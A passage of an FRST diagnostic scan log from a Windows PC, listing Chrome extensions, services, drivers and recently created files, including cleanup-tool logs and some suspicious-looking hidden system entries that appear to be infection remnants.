(Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-05-04] CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16] CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2 [2019-02-17] CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07] CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07] CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-27] CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07] CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07] CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-25] CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-16] CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16] CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07] CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07] CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16] CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3 [2019-02-17] CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07] CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07] CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-06-07] CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07] CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07] CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06] CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10] CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16] CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07] CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07] CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16] CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile [2019-02-15] CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08] CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10] CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10] ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 AgereModemAudio; C:\Program Files\LSI SoftModem\agr64svc.exe [42096 2015-08-05] (Avago Technologies U.S. Inc. -> LSI Corporation) R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.) S3 aspnet_state; C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [32768 2004-07-15] (Microsoft Corporation) [File not signed] R3 BlackBerry Device Manager; C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe [588024 2014-10-31] (BlackBerry Ltd. -> BlackBerry Limited) S3 CommuniGate Pro Messaging Server; C:\Windows\CommuniGatePro\CGStarter.exe [38552 2017-02-14] (CommuniGate Systems -> ) R2 hpHotkeyMonitor; C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\hpHotkeyMonitor.exe [684624 2015-06-23] (Hewlett-Packard -> Hewlett-Packard Company) S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (Hewlett-Packard Company -> HP) R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [347512 2018-12-06] (HP Inc. -> HP Inc.) R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-04-19] (Hewlett-Packard Company -> HP Inc.) R2 IsAppService; C:\Program Files (x86)\Iskysoft\IAF\2.4.2.223\IsAppService.exe [473352 2017-03-30] (Shenzhen Yi Xing Investment Co., Ltd. -> Iskysoft) R3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6562472 2019-02-01] (Malwarebytes Corporation -> Malwarebytes) R2 OpenVPNService; C:\Program Files\OpenVPN\bin\openvpnserv2.exe [24192 2018-03-06] (OpenVPN Technologies, Inc. -> ) R2 OpenVPNServiceInteractive; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project) S2 OpenVPNServiceLegacy; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project) R2 RIM MDNS; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe [396024 2015-05-26] (BlackBerry Ltd. -> Apple Inc.) R2 RIM Tunnel Service; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\tunmgr.exe [1355000 2015-05-26] (BlackBerry Ltd. -> BlackBerry Limited) R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246872 2017-11-17] (Synaptics Incorporated -> Synaptics Incorporated) S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6889232 2015-12-14] (TeamViewer -> TeamViewer GmbH) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation) ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 Accelerometer; C:\Windows\system32\DRIVERS\Accelerometer.sys [43840 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company) R3 AgereSoftModem; C:\Windows\system32\DRIVERS\agrsm64.sys [1230104 2015-08-05] (Microsoft Windows Hardware Compatibility Publisher -> LSI Corporation) S3 androidusb; C:\Windows\System32\Drivers\wsadb.sys [38008 2017-11-10] (Anvsoft Inc. -> Google Inc) S3 blackberryncm; C:\Windows\system32\DRIVERS\blackberryncm6_AMD64.sys [25600 2015-01-23] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited) R3 btwavdt; C:\Windows\system32\DRIVERS\btwavdt.sys [230656 2015-03-13] (Broadcom Corporation -> Broadcom Corporation.) S3 BTWUSB; C:\Windows\System32\Drivers\btwusb.sys [66136 2015-11-25] (Broadcom Corporation -> Broadcom Corporation.) S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) R3 e1cexpress; C:\Windows\system32\DRIVERS\e1c64x64.sys [468752 2014-07-29] (Intel Corporation -> Intel Corporation) R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [153328 2019-01-08] (Malwarebytes Corporation -> Malwarebytes) R0 hpdskflt; C:\Windows\System32\DRIVERS\hpdskflt.sys [31040 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company) S3 hwdatacard; C:\Windows\system32\DRIVERS\ewusbmdm.sys [116864 2009-06-03] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.) R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [127136 2019-02-16] (Malwarebytes Corporation -> Malwarebytes) R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [72864 2019-02-16] (Malwarebytes Corporation -> Malwarebytes) R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [274416 2019-02-16] (Malwarebytes Corporation -> Malwarebytes) R3 MBAMWebProtection; C:\Windows\system32\DRIVERS\mwac.sys [114040 2019-02-16] (Malwarebytes Corporation -> Malwarebytes) S3 Netaapl; C:\Windows\system32\DRIVERS\netaapl64.sys [23040 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple Inc.) R3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew00.sys [3349984 2014-03-08] (Intel Corporation-Mobile Wireless Group -> Intel Corporation) S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [80384 2015-01-14] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited) R3 rimvndis; C:\Windows\System32\Drivers\rimvndis6_AMD64.sys [18432 2015-05-26] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited) R3 RimVSerPort; C:\Windows\system32\DRIVERS\RimSerial_AMD64.sys [44544 2012-12-10] (Microsoft Windows Hardware Compatibility Publisher -> Research in Motion Ltd) R3 SPUVCbv; C:\Windows\System32\Drivers\SPUVCbv64.sys [749824 2017-11-27] (Sunplus Innovation Technology Inc. -> Sunplus Innovation Technology Inc.) S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) R3 tap0901; C:\Windows\system32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project) S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.) S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation) S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation) ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One month (created) ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2019-02-16 09:55 - 2019-02-16 09:55 - 000072864 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys 2019-02-16 09:54 - 2019-02-16 09:54 - 000274416 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys 2019-02-16 09:54 - 2019-02-16 09:54 - 000127136 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys 2019-02-16 09:54 - 2019-02-16 09:54 - 000114040 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys 2019-02-16 07:59 - 2019-02-16 07:59 - 000002719 _____ C:\Users\Stanley\Desktop\JRT.txt 2019-02-16 07:45 - 2019-02-16 07:53 - 000001638 _____ C:\Users\Stanley\Desktop\Rkill.txt 2019-02-16 07:45 - 2019-02-16 07:45 - 000000000 ____D C:\Users\Stanley\Desktop\rkill 2019-02-16 07:38 - 2019-02-16 07:44 - 000696026 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.38.18_log.txt 2019-02-16 07:35 - 2019-02-16 07:36 - 000004670 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.35.18_log.txt 2019-02-16 07:31 - 2019-02-16 07:31 - 000004416 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.31.06_log.txt 2019-02-16 07:23 - 2019-02-16 07:26 - 000000000 ____D C:\AdwCleaner 2019-02-15 02:09 - 2019-02-15 02:10 - 000002383 _____ C:\Users\Stanley\Desktop\Chrome Plus - Chrome.lnk 2019-02-15 02:09 - 2019-02-15 02:09 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP 2 - Chrome.lnk 2019-02-15 02:09 - 2019-02-15 02:09 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP - Chrome.lnk 2019-02-15 02:08 - 2019-02-15 02:08 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP 3 - Chrome.lnk 2019-02-15 00:32 - 2019-02-15 00:32 - 000000000 ____D C:\Users\Stanley\AppData\Local\mbam 2019-02-15 00:31 - 2019-02-15 00:31 - 000001883 _____ C:\Users\Public\Desktop\Malwarebytes.lnk 2019-02-15 00:31 - 2019-02-15 00:31 - 000000000 ____D C:\Users\Stanley\AppData\Local\mbamtray 2019-02-15 00:30 - 2019-02-15 00:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes 2019-02-15 00:30 - 2019-02-15 00:30 - 000000000 ____D C:\ProgramData\Malwarebytes 2019-02-15 00:30 - 2019-02-15 00:30 - 000000000 ____D C:\Program Files\Malwarebytes 2019-02-15 00:30 - 2019-01-08 15:32 - 000153328 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys 2019-02-14 02:41 - 2019-02-16 09:02 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\uTorrent 2019-02-13 22:08 - 2019-02-14 02:40 - 000000414 _____ C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job 2019-02-13 22:08 - 2019-02-13 22:08 - 000003256 _____ C:\Windows\System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold## 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\taskshostservices.exe 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\WinmonProcessMonitor.sys 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\winmonfs.sys 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\winmon.sys 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\system32\taskshostservices.exe 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\system32\Drivers\WinmonProcessMonitor.sys 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\mssecsvc.exe 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SysWOW64\SecureBootThemes 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\system32\SecureBootThemes 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SpeechsTracing 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SecureBootThemes 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\AppDiagnostics 2019-02-12 18:32 - 2019-02-13 14:18 - 000000000 ____D C:\Program Files (x86)\SMADAV 2019-02-12 18:32 - 2019-02-13 05:55 - 000000000 __SHD C:\[Smad-Cage] 2019-02-12 18:32 - 2019-02-12 18:32 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Smadav 2019-02-12 18:31 - 2019-02-12 18:31 - 001698648 _____ (Smadsoft ) C:\Users\Stanley\Downloads\smadav2019rev126.exe 2019-02-12 18:05 - 2019-02-12 18:06 - 064531912 _____ (Malwarebytes ) C:\Users\Stanley\Downloads\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9208.exe 2019-02-12 17:43 - 2019-02-16 09:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UC Browser 2019-02-12 05:59 - 2019-02-12 05:59 - 000104160 _____ C:\Users\Stanley\Downloads\Shortcut.txt 2019-02-12 05:53 - 2019-02-17 12:44 - 000000000 ____D C:\Users\Stanley\Downloads\FRST 2019-02-12 05:33 - 2019-02-17 12:44 - 000000000 ____D C:\FRST 2019-02-10 21:40 - 2019-02-10 21:40 - 000001483 _____ C:\Users\Stanley\Desktop\iexplore.exe - Shortcut.lnk 2019-02-10 07:29 - 2019-02-10 07:34 - 000003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-500 2019-02-10 07:28 - 2019-02-10 07:28 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Hewlett-Packard 2019-02-10 07:25 - 2019-02-10 20:12 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Apple Computer 2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Hewlett-Packard 2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\OpenVPN 2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Apple Computer 2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Packages 2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator 2019-02-10 07:24 - 2019-02-10 07:24 - 000001442 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2019-02-10 07:24 - 2019-02-10 07:24 - 000000020 ___SH C:\Users\Administrator\ntuser.ini 2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Adobe 2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Local\Google 2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk 2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk 2019-02-09 02:21 - 2019-02-09 02:21 - 000000000 ____D C:\Windows\pss 2019-02-09 01:24 - 2019-02-09 01:24 - 000000146 _____ C:\Users\Stanley\Desktop\Windows Defender - Shortcut.lnk 2019-02-08 22:53 - 2019-02-08 22:56 - 007406936 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe 2019-02-08 22:53 - 2019-02-08 22:56 - 001536112 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe 2019-02-08 22:53 - 2019-02-08 22:53 - 000000000 ____D C:\Users\#Strazzo.RoseGold## 2019-02-07 05:47 - 2019-02-07 05:47 - 000001178 _____ C:\Users\Public\Desktop\PhoneRescue.lnk 2019-02-07 05:40 - 2019-02-07 08:03 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Decipher Media 2019-02-07 05:25 - 2019-02-07 05:36 - 045726776 _____ (Decipher Media) C:\Users\Stanley\Downloads\DecipherBackupRepair.exe 2019-02-07 04:32 - 2019-02-07 04:39 - 040754877 _____ (iMacTools ) C:\Users\Stanley\Downloads\iBackupViewerSetup.exe 2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\iBackup Viewer 2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\CrashRpt 2019-02-07 03:11 - 2019-02-07 03:11 - 000000000 ____D C:\Users\Stanley\Documents\Apowersoft 2019-02-07 03:10 - 2019-02-07 03:10 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apowersoft 2019-02-07 02:04 - 2019-02-07 02:04 - 000000000 ____D C:\Users\Stanley\AppData\Local\Reincubate Temporary Files 2019-02-06 20:03 - 2019-02-06 20:06 - 006258864 _____ (iMobie Inc. ) C:\Users\Stanley\Downloads\phonebrowse-64-setup.exe 2019-02-06 19:48 - 2019-02-06 19:54 - 021424360 _____ (Reincubate Ltd) C:\Users\Stanley\Downloads\iphonebackupextractor-latest.exe 2019-02-06 05:53 - 2019-02-15 01:38 - 000000000 ____D C:\Users\Stanley\Downloads\MM_VideoDownload 2019-02-06 05:53 - 2019-02-06 05:53 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobiMoverUI 2019-02-06 05:30 - 2019-02-06 05:47 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\SystemAcCrux 2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\WindSolutions 2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\ProgramData\WindSolutions 2019-02-06 04:46 - 2019-02-06 04:46 - 000000000 ____D C:\Users\Stanley\AppData\Local\FoneDog 2019-02-06 04:26 - 2019-02-06 04:27 - 008046792 _____ (WindSolutions) C:\Users\Stanley\Downloads\Install_CopyTransControlCenter.exe 2019-02-06 04:23 - 2019-02-06 04:23 - 000000000 ____D C:\Users\Stanley\AppData\Local\Aiseesoft Studio 2019-02-05 11:35 - 2019-02-06 04:26 - 030804013 _____ (FoneDog ) C:\Users\Stanley\Downloads\fonedog-ios-toolkit.exe 2019-02-05 11:35 - 2019-02-05 11:35 - 000001133 _____ C:\Users\Stanley\Desktop\Syncios.lnk 2019-02-05 07:42 - 2019-02-05 07:42 - 000002343 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios Data Recovery.lnk 2019-02-05 07:42 - 2019-02-05 07:42 - 000002331 _____ C:\Users\Public\Desktop\Syncios Data Recovery.lnk 2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios 2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\Program Files (x86)\Syncios Data Recovery 2019-02-05 01:46 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple Computer 2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\Documents\Wondershare 2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobileBackupForeverIni 2019-02-05 00:50 - 2019-02-05 00:50 - 000000000 ____D C:\Users\Stanley\AppData\Local\AdvinstAnalytics 2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ C:\Users\Stanley\AppData\Local\installer.dat 2019-02-05 00:31 - 2019-02-05 01:39 - 000000000 ____D C:\Users\Stanley\AppData\Local\Deployment 2019-02-05 00:31 - 2019-02-05 00:31 - 000000000 ____D C:\Users\Stanley\AppData\Local\Apps\2.0 2019-02-04 23:57 - 2019-02-04 23:57 - 000000000 ____D C:\Users\Stanley\AppData\Local\DigiDNA 2019-02-04 23:54 - 2019-02-05 00:05 - 112497792 _____ C:\Users\Stanley\Downloads\setup_syncios (1).exe 2019-02-04 22:32 - 2019-02-04 22:32 - 000000000 ____D C:\Users\RoseGold\Documents\Syncios 2019-02-02 10:43 - 2019-02-02 10:43 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple 2019-01-31 12:39 - 2019-01-31 12:39 - 000048210 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-23 at 1.56.07 PM.jpeg 2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM.jpeg 2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM (1).jpeg 2019-01-31 10:20 - 2019-01-31 10:20 - 000046824 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-20 at 8.50.51 PM.jpeg 2019-01-31 10:17 - 2019-01-31 10:17 - 000046880 _____ C:\Users\Stanley\Downloads\usd slip1.jpeg 2019-01-30 07:56 - 2019-02-10 07:34 - 000003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1004 2019-01-30 07:52 - 2019-01-31 06:21 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\hpqlog 2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios 2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Apple Computer 2019-01-30 07:51 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\.android 2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios Data Transfer 2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\SyncDroid 2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Research In Motion 2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\BlackBerry 2019-01-30 07:48 - 2019-02-12 06:38 - 000001446 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2019-01-30 07:48 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Packages 2019-01-30 07:48 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold 2019-01-30 07:48 - 2019-01-30 07:48 - 000000020 ___SH C:\Users\RoseGold\ntuser.ini 2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Adobe 2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\VirtualStore 2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Google 2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk 2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk 2019-01-27 09:06 - 2019-01-27 09:06 - 000202698 _____ C:\Users\Stanley\Downloads\114328 (1).pdf 2019-01-27 08:22 - 2019-01-27 08:22 - 000202698 _____ C:\Users\Stanley\Downloads\114328.pdf 2019-01-26 22:39 - 2019-01-26 22:39 - 000001160 _____ C:\Users\Stanley\Downloads\converted_1082592538.txt 2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ___HD C:\OneDriveTemp 2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ____D C:\Users\Stanley\OneDrive 2019-01-26 14:55 - 2019-01-26 14:55 - 000075241 _____ C:\Users\Stanley\Downloads\newocr.com-20190126135542.pdf 2019-01-26 14:01 - 2019-01-26 14:01 - 000351579 _____ C:\Users\Stanley\Downloads\001 (2).pdf 2019-01-26 13:59 - 2019-01-26 13:59 - 000315587 _____ C:\Users\Stanley\Downloads\001 (1).pdf 2019-01-26 13:53 - 2019-01-26 13:53 - 000271265 _____ C:\Users\Stanley\Downloads\topdf.zip 2019-01-26 13:53 - 2019-01-26 13:52 - 000315587 _____ C:\Users\Stanley\Downloads\001.pdf 2019-01-26 06:02 - 2019-01-26 06:02 - 000001759 _____ C:\Users\Public\Desktop\iTunes.lnk 2019-01-26 06:02 - 2019-01-26 06:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes 2019-01-26 06:01 - 2019-01-26 06:01 - 000000000 ____D C:\Program Files\iPod 2019-01-26 06:00 - 2019-01-26 06:02 - 000000000 ____D C:\Program Files\iTunes 2019-01-26 05:48 - 2019-01-26 05:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud 2019-01-22 12:20 - 